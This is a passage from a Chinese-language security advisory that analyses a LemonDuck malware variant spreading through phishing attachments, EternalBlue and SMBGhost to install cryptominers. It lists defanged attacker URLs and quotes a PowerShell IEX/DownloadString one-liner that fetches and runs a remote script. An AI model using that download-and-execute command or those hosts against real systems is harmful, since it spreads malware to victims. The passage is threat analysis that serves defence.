「安全通告」新版“LemonDuck”搭载“永恒之蓝”，新增EXE攻击模块惹人关注(3)

如果没有更新补丁修复Scriptletfile功能，就可能触发漏洞执行PowerShell命令执行恶意代码。钓鱼邮件另一个附件中加入了“readme.zip”，解压后是一个恶意的JS文件“readme.js”，该JS文件开头为“//This File is broken.”，中间被插入大段空白，恶意代码内容在文件尾部，运行后会链接地址下载恶意脚本：http[：]//t.tr2q.com/mail.jsp

创建计划任务下载的http[：]//t.amynx.com/a.jsp文件会下载if.bin和kr.bin以及m6.bin和m6g.in等挖矿程序：

其中攻击模块if.bin在smbghost_exec函数中利用从hxxp：//d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击，攻击成功后远程执行以下shellcode：powershell IEx(New- ObjectNet.WebClient).DownLoadString(""http[：]///t.amynx.com/smgho.jsp?0.8*%computername%"")